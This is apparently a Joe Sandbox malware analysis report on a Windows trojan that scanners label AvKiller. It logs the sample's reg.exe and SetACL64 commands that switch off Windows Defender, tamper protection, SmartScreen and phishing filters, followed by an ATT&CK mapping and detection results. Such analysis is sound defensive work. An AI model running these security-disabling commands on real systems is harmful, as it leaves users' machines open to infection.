Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe

Code function: 4_2_00007FF6970680F6 SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,SetSecurityDescriptorDacl,SetSecurityDescriptorSacl,GetLastError,MakeSelfRelativeSD,MakeSelfRelativeSD,GetLastError,_invalid_parameter_noinfo_noreturn,

4_2_00007FF6970680F6

Source: PowerRun64.exe.0.dr

Binary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe

Code function: 4_2_00007FF69708BD40 cpuid

4_2_00007FF69708BD40

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	4_2_00007FF697086C40
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,	4_2_00007FF69708791C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_00007FF697087674
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: GetLocaleInfoW,	4_2_00007FF697087548
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_00007FF697087498
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: GetLocaleInfoW,	4_2_00007FF697087340
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,	4_2_00007FF69708705C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_00007FF6970870F4
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,	4_2_00007FF697086F8C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: try_get_function,GetLocaleInfoW,	4_2_00007FF697087EB0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	5_2_00007FF697086C40
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,	5_2_00007FF69708791C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_00007FF697087674
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: GetLocaleInfoW,	5_2_00007FF697087548
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_00007FF697087498
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: GetLocaleInfoW,	5_2_00007FF697087340
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,	5_2_00007FF69708705C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	5_2_00007FF6970870F4
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,	5_2_00007FF697086F8C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: try_get_function,GetLocaleInfoW,	5_2_00007FF697087EB0

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe

Code function: 4_2_00007FF69704D304 GetSystemTimeAsFileTime,GetCurrentThreadId,GetUserNameExW,GetLastError,GetUserNameExW,GetLastError,LeaveCriticalSection,LeaveCriticalSection,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

4_2_00007FF69704D304

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe

Code function: 4_2_00007FF69706F3C0 LookupAccountNameW,GetLastError,GetLastError,LookupAccountNameW,GetLastError,IsValidSid,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,

4_2_00007FF69706F3C0

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe

0_2_0040350F

Lowering of HIPS / PFW / Operating System Security Settings

Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry

Source: C:\Windows\SysWOW64\reg.exe

Registry value created: SpyNetReportingLocation 0

Jump to behavior

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions	Registry value created: DisableAutoExclusions 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine	Registry value created: MpEnablePus 0

Disables Windows Defender Tamper protection

Source: C:\Windows\SysWOW64\reg.exe

Registry value created: TamperProtectionSource 2

Jump to behavior

Disables the Smart Screen filter

Source: C:\Windows\SysWOW64\reg.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer SmartScreenEnabled Off

Jump to behavior

Disables the phising filter of Microsoft Edge

Source: C:\Windows\SysWOW64\reg.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter PreventOverride

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Native API	1 Scripting	1 DLL Side-Loading	6 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 DLL Side-Loading	1 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	2 Browser Session Hijacking	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Access Token Manipulation	1 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	12 Process Injection	1 Timestomp	NTDS	34 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	121 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Bypass User Account Control	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
3Dut8dFCwD.exe	45%	ReversingLabs	Win32.Trojan.AvKiller
3Dut8dFCwD.exe	46%	Virustotal		Browse
3Dut8dFCwD.exe	100%	Avira	BAT/Disabler.ktkgs
3Dut8dFCwD.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exe	21%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exe	19%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exe	5%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\nsExec.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\win_version_csharp.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\win_version_csharp.exe	1%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
fp2e7a.wpc.phicdn.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://helgeklein.com	0%	Avira URL Cloud	safe
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe	0%	Avira URL Cloud	safe
https://helgeklein.com.	0%	Avira URL Cloud	safe
https://helgeklein.com.	0%	Virustotal		Browse
https://helgeklein.com	0%	Virustotal		Browse
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_ErrorError	3Dut8dFCwD.exe	false	URL Reputation: safe	unknown
https://helgeklein.com.	SetACL64.exe, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://helgeklein.com	SetACL64.exe, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe	SetACL64.exe, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1472091
Start date and time:	2024-07-12 09:52:01 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	3Dut8dFCwD.exe renamed because original name is a hash value
Original Sample Name:	3f58da2e1652dddab53995166f24993f.exe
Detection:	MAL
Classification:	mal100.phis.evad.winEXE@145/7@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 64 Number of non-executed functions: 167
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 20.3.187.198
